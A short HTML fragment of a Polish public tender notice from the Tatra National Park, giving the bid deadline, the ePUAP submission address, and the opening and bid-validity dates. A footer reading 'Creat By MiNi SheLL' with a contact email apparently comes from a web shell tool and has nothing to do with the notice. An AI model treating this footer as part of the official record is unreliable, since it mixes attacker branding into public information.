umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">skrzynka epuap : Tatrzański Park Narodowy, ul. Kuźnice 1, 34-500 Zakopane</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-06 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com